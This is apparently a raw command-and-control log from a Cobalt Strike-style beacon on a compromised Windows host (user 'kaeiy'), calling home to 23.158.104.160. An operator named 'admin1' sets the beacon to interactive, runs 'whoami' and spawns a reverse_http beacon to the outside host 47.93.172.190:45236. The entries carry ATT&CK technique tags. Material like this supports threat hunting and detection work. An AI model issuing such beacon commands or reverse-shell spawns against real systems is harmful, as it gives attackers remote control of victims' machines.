11/19 05:11:51 UTC [metadata] 23.158.104.160 <- 192.168.1.13; computer: NOT-FOUND-404; user: kaeiy *; process: beacon_x86.exe; pid: 8804; os: Windows; version: 6.2; build: 9200; beacon arch: x86 (x64)
11/19 05:11:45 UTC [task] <T1029> Tasked beacon to sleep for 30s (30% jitter)
11/19 05:11:45 UTC [note] Bid: 1098411906  NT: 6.2
11/19 05:11:45 UTC [task] <T1029> Tasked beacon to become interactive
11/19 05:11:51 UTC [input] <admin1> sleep 0
11/19 05:11:51 UTC [task] <T1029> Tasked beacon to become interactive
11/19 05:12:45 UTC [checkin] host called home, sent: 48 bytes
11/19 05:57:41 UTC [input] <admin1> shell whoami
11/19 05:57:41 UTC [task] <T1059> Tasked beacon to run: whoami
11/19 05:57:42 UTC [checkin] host called home, sent: 37 bytes
11/19 05:57:50 UTC [output]
received output:
not-found-404\kaeiy


11/19 05:57:58 UTC [input] <admin1> spawn
11/19 05:58:01 UTC [task] <T1093> Tasked beacon to spawn (x86) windows/beacon_http/reverse_http (47.93.172.190:45236)
11/19 05:58:01 UTC [checkin] host called home, sent: 239624 bytes
